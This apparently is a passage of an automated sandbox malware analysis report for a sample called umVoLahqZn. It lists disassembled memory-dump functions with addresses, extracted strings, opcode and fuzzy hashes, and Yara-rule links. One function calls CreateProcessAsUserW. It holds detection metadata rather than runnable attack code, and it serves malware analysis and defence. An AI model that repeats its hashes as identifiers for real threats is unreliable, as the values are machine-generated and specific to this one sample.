Opcode Fuzzy Hash: 87e7359f323dedb865ff8b001a8155370d7c4887b2d734647673ec7100522281
Instruction Fuzzy Hash: D481E4B0D152298FCB14CFE5D9446EEBBF2BF89300F20942AD416BB254DB345A42DF68

Function 07E24B50 Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

6f, xrefs: 07E24DA2
6f, xrefs: 07E24DB0
$]q, xrefs: 07E24BD9

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 6f$6f$$]q
API String ID: 0-3010377955
Opcode ID: 926c3823156098b13de61431d3cbfa24934d3ea65c7aa208ec847380975c3e5b
Instruction ID: 073034bf74a37d1960c1711bb485016a9d9b2b378b26a6df8e0f1eec201a3a17
Opcode Fuzzy Hash: 926c3823156098b13de61431d3cbfa24934d3ea65c7aa208ec847380975c3e5b
Instruction Fuzzy Hash: A77113B4E00219DFDB48DFA5D5845DEBBB2FF89700F20802AE406AB354DB305946DF51

Function 01537D48 Relevance: 3.0, Strings: 2, Instructions: 512COMMON

Download Yara Rule

Strings

(o]q, xrefs: 01538282
Haq, xrefs: 0153814E

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: (o]q$Haq
API String ID: 0-903699183
Opcode ID: 91854fee9e122c34b9647e9524b18be3033aaac0df089f42faa5d160e869c1aa
Instruction ID: 05ecd3dc6014a0ae78e783f8a0d2c88ff96a1450f83b359e20929c71c2a11ccf
Opcode Fuzzy Hash: 91854fee9e122c34b9647e9524b18be3033aaac0df089f42faa5d160e869c1aa
Instruction Fuzzy Hash: E9127FB0A002199FDB19DF69C844AAEBBF6FFC8300F248559E445DB3A5DB349D42CB90

Function 01531980 Relevance: 2.9, Strings: 2, Instructions: 354COMMON

Download Yara Rule

Strings

$]q, xrefs: 01531AA6
Xaq, xrefs: 01531ABF

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: 409ea48c01d4c03d02b52655b5e2be9a60f6419a851250cb599888c153e93753
Instruction ID: 8254b8b79f471dc55f7450d9ea58d70f67ef3c15d63948f9198d1560ffeeb953
Opcode Fuzzy Hash: 409ea48c01d4c03d02b52655b5e2be9a60f6419a851250cb599888c153e93753
Instruction Fuzzy Hash: 4CB1F474B042159FDB18AF79989463E7BF7BFC9710B04892AE406DF398DE34C8028792

Function 07CBCEF8 Relevance: 2.7, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07CBCF71
Te]q, xrefs: 07CBD14A

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: aef86c0d4b6aa21ad010d041cb9891196a4fd919ef0e39d68e17a3e559577664
Instruction ID: d66bf5e5d7c81a6b45f96cbff1f1255fff29d11837f16ce65b9ce4cb9ea94202
Opcode Fuzzy Hash: aef86c0d4b6aa21ad010d041cb9891196a4fd919ef0e39d68e17a3e559577664
Instruction Fuzzy Hash: BA91D3B4E042098FDB18CFAAC9909DEFBB2BF89300F14942AE415BB354D7349946CB60

Function 07CBCF08 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07CBCF71
Te]q, xrefs: 07CBD14A

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: c079804e1f724a9330894f025ba9bfab31eb051edc9a243abbfbda44f62d218e
Instruction ID: 98223087e935540e8cd080c50900d3008ce481f94ebba843165cacf093e0584f
Opcode Fuzzy Hash: c079804e1f724a9330894f025ba9bfab31eb051edc9a243abbfbda44f62d218e
Instruction Fuzzy Hash: A191C2B4E102198FCB18CFEAC590ADEFBB2BF89310F14942AE415BB354D73499468F54

Function 07E24B4A Relevance: 2.7, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

6f, xrefs: 07E24DB0
$]q, xrefs: 07E24BD9

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 6f$$]q
API String ID: 0-403443862
Opcode ID: 95bf7d9f11f9c8dd73167985a787e9335285410c07599fdcf322ba80b5d26de2
Instruction ID: 0213b76068e0ba6885eb7dc7dea413a2411d2cbea8798b619e199bfe21bf846e
Opcode Fuzzy Hash: 95bf7d9f11f9c8dd73167985a787e9335285410c07599fdcf322ba80b5d26de2
Instruction Fuzzy Hash: F47114B4E00219DFDB48DFA9D58499EBBF2FF89700F20852AE406A7364DB305946DF50

Function 07E2BC58 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07E2BDC3

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: b9ed6832f0808ff6ffdbca14316f2a051a079b4c4070e03d129fe8d2a2edbbf3
Instruction ID: a0401943a829f50ca7145a7161cadab1272392ba6b1d4b38a17c157a2e205b40
Opcode Fuzzy Hash: b9ed6832f0808ff6ffdbca14316f2a051a079b4c4070e03d129fe8d2a2edbbf3
Instruction Fuzzy Hash: 6651F7B190022ADFDB24CF59C840BDDBBB5BF48314F0484AAE919B7250DB759A85DF90

Function 07CBEFF8 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

kQD, xrefs: 07CBF278

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: kQD
API String ID: 0-3066535408
Opcode ID: b43fa0e5debef74b473d769428584ae8ca640c120cb8a8255248660d5fce7f8b
Instruction ID: 4df5fd60a5e7306bb401ec39d161163c73bdcdb6e17dff0823f2f409a75d2cb6
Opcode Fuzzy Hash: b43fa0e5debef74b473d769428584ae8ca640c120cb8a8255248660d5fce7f8b
Instruction Fuzzy Hash: D7C128B4D1521ADFCB14CF9AD9808AEFBB2FF89300F148559E515AB314D734AA42CF91

Function 07CBD780 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

>NG, xrefs: 07CBD836

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: >NG
API String ID: 0-1926143806
Opcode ID: 8bb39dd053c27925cc3b0e4a2b5f52b7304b032964d3883563931c2452d650b2
Instruction ID: a61d18557e4413e36c5c7b0a6f33a376b47b7feae55abf383706a63e07bc69e5
Opcode Fuzzy Hash: 8bb39dd053c27925cc3b0e4a2b5f52b7304b032964d3883563931c2452d650b2
Instruction Fuzzy Hash: 43613FB0E152198FCB18CFA9D4406EEFBF2BF89311F14C16AE51AB7254D7349A41CBA4

Function 07CB8DB8 Relevance: 1.4, Instructions: 1392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95f18ee27c45d5760a280044ee98d5276ea9fd5d2770f08cf91fe6d24483acb0
Instruction ID: de7bda8954d888cde4588ce72e521730d51add1126756c139221e3917060d319
Opcode Fuzzy Hash: 95f18ee27c45d5760a280044ee98d5276ea9fd5d2770f08cf91fe6d24483acb0
Instruction Fuzzy Hash: EEC28070E102299BCB24EF79D8857ADBBB6FB89304F4085A9D44DA7340DE389D85CF52

Function 07CBAE52 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

<, xrefs: 07CBAF85

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: e7b40c90cb797827534a018be66589303b45dcb7acb0718ac1d0783baf2a0d98
Instruction ID: 173b7604b802bed39642427d7ff57da3bf23adda07a854358d45b25b2fadbf4e
Opcode Fuzzy Hash: e7b40c90cb797827534a018be66589303b45dcb7acb0718ac1d0783baf2a0d98
Instruction Fuzzy Hash: D75193B1E016588FDB59CFAAC9446DDBBF2AFC9301F14C0AAD409AB264DB345A85CF40

Function 06524C78 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2727211850.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6520000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f65ee6cdd612c5dc1f418127e60b6fd96e0fbec65b923eea101cd2a373ca2c5
Instruction ID: f52add5076432a9104789a47283a81804d8818aadb19f52d91e515afcfab7936
Opcode Fuzzy Hash: 7f65ee6cdd612c5dc1f418127e60b6fd96e0fbec65b923eea101cd2a373ca2c5
Instruction Fuzzy Hash: 37525A34A003568FCB14DF28C944B99B7F2FF8A314F2586A9D4586F2A1DB71AD86CF41

Function 06524C68 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2727211850.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6520000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44914695ce9579b5e8233844d1ef2939ce29273735d8ce6a1af87a5a33ce6c82
Instruction ID: f5c5794c23635b6fd3cd1cafe27afb8fd333c2240dd8dac00a45fe1dfe493007
Opcode Fuzzy Hash: 44914695ce9579b5e8233844d1ef2939ce29273735d8ce6a1af87a5a33ce6c82
Instruction Fuzzy Hash: 54525C34A003568FCB14DF28C944B99B7F2FF86314F2586A9D4586F2A1DB71AD86CF81

Function 07E26E78 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc335a491ed1f348f3b3061eb8eee8d383715cd890092cf5c3c3316be9c9a959
Instruction ID: 53db607606db631d4c57072fd1d409290b6a0025799745038c17efe227df5cb4
Opcode Fuzzy Hash: fc335a491ed1f348f3b3061eb8eee8d383715cd890092cf5c3c3316be9c9a959
Instruction Fuzzy Hash: A0F129B4A1526A8FCB64CF29C84479DBBB6FF88340F1495EAD40AA7354D7709E82DF04

Function 0153118E Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63a09c5a195e23d98f1f0437da65411881adcac8f0a27047adb387f77f87f3a
Instruction ID: ddd3fa32b9e7cedf471ea72073da16263fd43f8f274b453f2008debaf205e490
Opcode Fuzzy Hash: b63a09c5a195e23d98f1f0437da65411881adcac8f0a27047adb387f77f87f3a
Instruction Fuzzy Hash: CC518E30B006048FD7289F7AD8947AE7BA6FBC8710F198869D50A9F3A4DE749C45CB91

Function 07E26620 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154fdb095a7a4037769bae26509de16057d4408e1eb07725d649e4d7b7dc24fa
Instruction ID: e4e95b8ad6c23e3d5b8233abb333272d2eb6038d8ce532f53301812acf4e6686
Opcode Fuzzy Hash: 154fdb095a7a4037769bae26509de16057d4408e1eb07725d649e4d7b7dc24fa
Instruction Fuzzy Hash: BB616AB0D12229DFCB08CFA5D9446EEBBB1FF49340F109629E412AB350C7745A46EF55

Function 07E26619 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0672f66349dd9f7595c95cf269ac1ba56efff91bca2c6b6ac4b70bdf03f8bd2
Instruction ID: 7abcd0b2ece26f54d99ee37465b480d9224365f315bd15e6b4af3b22f6f00031
Opcode Fuzzy Hash: a0672f66349dd9f7595c95cf269ac1ba56efff91bca2c6b6ac4b70bdf03f8bd2
Instruction Fuzzy Hash: 8B51A0B0D12229DFCB08CFA5D8446EEBBB1FF49340F10952AE412AB350C7349A06DF54

Function 07CBE148 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 811a71cf466f4c3aa1a19e54d21072914c1bdb6be44e99c073c32357361b4d85
Instruction ID: 1f5ede5067c6ecda86c6bf618bd35ef08cb0037c6c16a486dcf9a5c5235f07fb
Opcode Fuzzy Hash: 811a71cf466f4c3aa1a19e54d21072914c1bdb6be44e99c073c32357361b4d85
Instruction Fuzzy Hash: 0A511CB0D01258CFDB28CFA6D8846DEBBB2FF89710F1484A9E50967354DB345A85CF51

Function 07E21820 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ee52efdf836774cb50274c27cadbdc2648feb2ca8f971b5e70580c80d285417
Instruction ID: de38100e5e36559193eeff1d70dfa67133f2051600fe44bcbfe2335a6c1cf1fd
Opcode Fuzzy Hash: 0ee52efdf836774cb50274c27cadbdc2648feb2ca8f971b5e70580c80d285417
Instruction Fuzzy Hash: 7421AAB1E116188BEB58CF6BDC4069EFBF7BFC9200F04C1BAD508A6264DB341A568F51

Function 01538A98 Relevance: 10.5, Strings: 8, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 01538AD6
(o]q, xrefs: 01538FA7
(o]q, xrefs: 01538C5A
,aq, xrefs: 01538F38
(o]q, xrefs: 01538FB7
(o]q, xrefs: 01538B91
(o]q, xrefs: 01538BBD
,aq, xrefs: 01538F48

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: a51e76f20b6e4a122a3d8259629e52a6ac19043a44cc2d98f8c22b59fcb1ac81
Instruction ID: 810ff94a7b62625a1a0f8b45d6ed6aa51037e4d6032bc9f822a5d22b823570c9
Opcode Fuzzy Hash: a51e76f20b6e4a122a3d8259629e52a6ac19043a44cc2d98f8c22b59fcb1ac81
Instruction Fuzzy Hash: 4C125870A006099FCB29CF69D984A9EBBF6FF88314F148A69F5199B361D730ED41CB50

Function 01535D28 Relevance: 8.9, Strings: 7, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 01535DD0
8aq, xrefs: 01535F31
tP]q, xrefs: 01535E42
tP]q, xrefs: 01535E38
$]q, xrefs: 01535DF6
tP]q, xrefs: 01535E1C
$]q, xrefs: 01535DEA

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 8aq$tP]q$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-824007586
Opcode ID: fea09bf5c161d0301c477d14289fc6e1e9992f9573023d881bfe82b228f8b66b
Instruction ID: 633911d33e9a1a1433cd2803cdaf044d6584c58dbe5b8ab24f73c755e7237f01
Opcode Fuzzy Hash: fea09bf5c161d0301c477d14289fc6e1e9992f9573023d881bfe82b228f8b66b
Instruction Fuzzy Hash: 4751B430B102058FD7259B7AC84476EBBE6BFC8700F14D86AD11ACF2A5EA35D845C791

Function 0153B828 Relevance: 8.8, Strings: 7, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0153B943
Te]q, xrefs: 0153B891
Te]q, xrefs: 0153B872
Te]q, xrefs: 0153B863
Te]q, xrefs: 0153B857
Te]q, xrefs: 0153B842
Te]q, xrefs: 0153B885

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: PH]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q
API String ID: 0-2943635446
Opcode ID: bc9e8c26f60335dd99d1a88a46bdcc9e29e8f605d0e265d55ca7b7ec11c59344
Instruction ID: 4ed792515aae28169470fc571906a43116bbca28fe375dd25070c44b0f71cc42
Opcode Fuzzy Hash: bc9e8c26f60335dd99d1a88a46bdcc9e29e8f605d0e265d55ca7b7ec11c59344
Instruction Fuzzy Hash: 27319431E002098FDB289FADC4587AEBBF6BBC8B10F548919D456AB394CF744C85CB91

Function 0153B818 Relevance: 6.3, Strings: 5, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0153B943
Te]q, xrefs: 0153B872
Te]q, xrefs: 0153B857
Te]q, xrefs: 0153B842
Te]q, xrefs: 0153B885

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: PH]q$Te]q$Te]q$Te]q$Te]q
API String ID: 0-3341053991
Opcode ID: 713ffc4bd1e3f46d785f92f81bc90c0bf1ec827d00e29e7d6b75d1ff45beb4da
Instruction ID: ee2015b1f00d7af3ef48e04a41f71bc12f0ae02f8f14aa7b652ace12a4ac7258
Opcode Fuzzy Hash: 713ffc4bd1e3f46d785f92f81bc90c0bf1ec827d00e29e7d6b75d1ff45beb4da
Instruction Fuzzy Hash: 84317031E00209DFDB289FA9C4547AEBBF2BBC8710F14892ED456AB694CB754C85CB91

Function 01535D19 Relevance: 5.1, Strings: 4, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 01535DD0
tP]q, xrefs: 01535E38
tP]q, xrefs: 01535E1C
$]q, xrefs: 01535DEA

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: tP]q$tP]q$$]q$$]q
API String ID: 0-1338969139
Opcode ID: 8af6028d5ee443eaad3d73c9810cf019383c3e8d8b410b20f9f578951f6d88ef
Instruction ID: 6a3e8168f326ba96d3a189af3fda2d410fd12585b4fe184eeb39624947a1aeb5
Opcode Fuzzy Hash: 8af6028d5ee443eaad3d73c9810cf019383c3e8d8b410b20f9f578951f6d88ef
Instruction Fuzzy Hash: 0531C6307103058FE7398A69C84472E7BE6BFC4700F18D9AAD4564F2A5EB759C44C7A1

Function 01539B70 Relevance: 4.6, Strings: 3, Instructions: 825COMMON

Download Yara Rule

Strings

$]q, xrefs: 0153A6B7
$]q, xrefs: 0153A694
(o]q, xrefs: 0153A871

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: (o]q$$]q$$]q
API String ID: 0-989248301
Opcode ID: d5e7cc414be17845a99812a32cca61a2639137ed8e62319a54b25f010f361ea6
Instruction ID: 5d30630c16a9d5e032d4be9b56cb16f5b4d54ad9f2e5b785adcc5e36661e1834
Opcode Fuzzy Hash: d5e7cc414be17845a99812a32cca61a2639137ed8e62319a54b25f010f361ea6
Instruction Fuzzy Hash: 3C726F74A0021D8FDB25DBA5C950BAEBBB6FF84300F1080A9C54AAB3A5DF349D45DF91

Function 01537148 Relevance: 4.2, Strings: 3, Instructions: 430COMMON

Download Yara Rule

Strings

Haq, xrefs: 01537319
7, xrefs: 015375F8
Haq, xrefs: 0153734C

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 7$Haq$Haq
API String ID: 0-3030771670
Opcode ID: eaf54df97075bf325fd6d312c3df4d7ea505a237947645e76fabb5a6a0db8c06
Instruction ID: 359c36e9bc5088a7f054f40a79b73754f9d482e7c2c99f8c86b99f28cadb8b18
Opcode Fuzzy Hash: eaf54df97075bf325fd6d312c3df4d7ea505a237947645e76fabb5a6a0db8c06
Instruction Fuzzy Hash: 91E1BE70B002159FDB15AF69C894B7E7BA6BBC8341F148829E906CB3A5CF74DD42CB91

Function 07C51C10 Relevance: 4.0, Strings: 3, Instructions: 254COMMON

Download Yara Rule

Strings

(aq, xrefs: 07C51DB5
(aq, xrefs: 07C51E27
(aq, xrefs: 07C51D89

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: (aq$(aq$(aq
API String ID: 0-2593664646
Opcode ID: 0a6ea6a9c9da3609f312e0381f0c572838d9e997249cc4d3e65df201a8f49b4e
Instruction ID: 3890bcf9a6f96682eb2ec3cac75637533387e5d5d767a97db942ef3beaf009e2
Opcode Fuzzy Hash: 0a6ea6a9c9da3609f312e0381f0c572838d9e997249cc4d3e65df201a8f49b4e
Instruction Fuzzy Hash: 75A1AFB0A003099FCB15DFA9C84879EFBF5FF89310F148559E805AB251DB759D81CBA1

Function 07C53244 Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07C53357
TJbq, xrefs: 07C5336C
@, xrefs: 07C5324C

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: @$TJbq$Te]q
API String ID: 0-2800237591
Opcode ID: 4a4802fed740d0d5f69edfa133177dff48bb25c3a7150c543d8305c540eca837
Instruction ID: 9beedc537bd65b8241564307458dbbc432241a85b8e0bbfeb59cbb919059fba8
Opcode Fuzzy Hash: 4a4802fed740d0d5f69edfa133177dff48bb25c3a7150c543d8305c540eca837
Instruction Fuzzy Hash: DB41979160E7D14FD7035B38986465A7FB2AF97118B1E01DBC1C6CF6E3D9198C0A83AB

Function 07C521F0 Relevance: 2.9, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

Haq, xrefs: 07C522A8
Haq, xrefs: 07C52331

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: acf9a2fd723bbe59e0ae6bcec555fddd0c298b837a7e5ccedcfbc20ba09aaa24
Instruction ID: 6331bcc7e26556669f84cede889a887a2fffa4df03e16409d1a840c9fb5ff9b1
Opcode Fuzzy Hash: acf9a2fd723bbe59e0ae6bcec555fddd0c298b837a7e5ccedcfbc20ba09aaa24
Instruction Fuzzy Hash: F3D1E1B0A142098BC704FBB9D89966EBFF6FFC9340F454869D449B7390DE384C4687A6

Function 0153BDB0 Relevance: 2.8, Strings: 2, Instructions: 339COMMON

Download Yara Rule

Strings

4']q, xrefs: 0153BDFF
4']q, xrefs: 0153BDD9

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 3c1c5223b1e68dbacaaa77e70cb15049cea6aea2d0f7374434b315e3d78a4119
Instruction ID: 578cea022ef8346cbaf6d9607719dee0f7d2a0259c8f041ce4f6824086340955
Opcode Fuzzy Hash: 3c1c5223b1e68dbacaaa77e70cb15049cea6aea2d0f7374434b315e3d78a4119
Instruction Fuzzy Hash: E2B15D303041018FEB359A2DC89873E7BEABFC5A44F1445ABE612DF3A5DA29CC42E751

Function 01537838 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

,aq, xrefs: 0153790E
,aq, xrefs: 01537918

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: 0a7e3fc60a9226af3136fb5e4cc9702e4d214439328b08749f15100478a63e6f
Instruction ID: 0882f62cc6d04d335f0c442f2d6c83883a41d6c8ca2e9990905f6df16639e265
Opcode Fuzzy Hash: 0a7e3fc60a9226af3136fb5e4cc9702e4d214439328b08749f15100478a63e6f
Instruction Fuzzy Hash: 4F817AB5E00106CFDB14CFADC884AAEBBF6BFCD210B158569D506AB365D731E942CB50

Function 0153BBD0 Relevance: 2.6, Strings: 2, Instructions: 136COMMON

Download Yara Rule

Strings

Haq, xrefs: 0153BCC7
Haq, xrefs: 0153BCFA

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: e25bc8a38050edd77f5b48d46e261698bd267be89b1d1e87af9aba3aa07aa742
Instruction ID: 7e31b39cc58a72433337568f6144096c03db61a9a1fe70ed24b9e8e4e7b3f3b9
Opcode Fuzzy Hash: e25bc8a38050edd77f5b48d46e261698bd267be89b1d1e87af9aba3aa07aa742
